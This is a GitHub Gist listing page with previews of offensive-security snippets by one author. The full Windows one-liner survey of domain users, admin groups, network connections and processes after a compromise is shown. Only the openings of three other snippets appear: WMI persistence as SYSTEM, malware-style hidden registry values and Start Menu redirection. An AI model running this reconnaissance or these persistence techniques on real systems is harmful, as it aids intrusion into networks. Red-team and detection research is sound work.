Kyle Hanslovan KyleHanslovan

KyleHanslovan / DomainEnumeration.bat
Created June 25, 2016 12:36
Post-exploitation host/domain survey using native Windows commands.
whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1
KyleHanslovan / WMIPersistence.mof
Created June 8, 2016 08:22
VBS-based ActiveScriptEventConsumer useful for launching applications at startup as SYSTEM.
/*
Author: Kyle Hanslovan
Contact: @KyleHanslovan
License: MIT
Date: 07/18/2014
*/
#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
instance of ActiveScriptEventConsumer as $Consumer
KyleHanslovan / CreateNullRegValue.py
Created June 3, 2016 15:33
Script which uses Native APIs to create a "hidden" registry value similar to Poweliks and Kovter malware.
from ctypes import *
from ctypes.wintypes import *
import winreg
NTSTATUS = c_long
PVOID = c_void_p
PWSTR = c_wchar_p
OBJ_CASE_INSENSITIVE = 0x00000040
KyleHanslovan / StartMenuRedirection.py
Last active August 18, 2016 23:00
PoC for Start Menu Redirection
import os
import sys
import pythoncom
from win32com.shell import shell, shellcon
def create_shortcut(dest_path, target_path):
    """
    """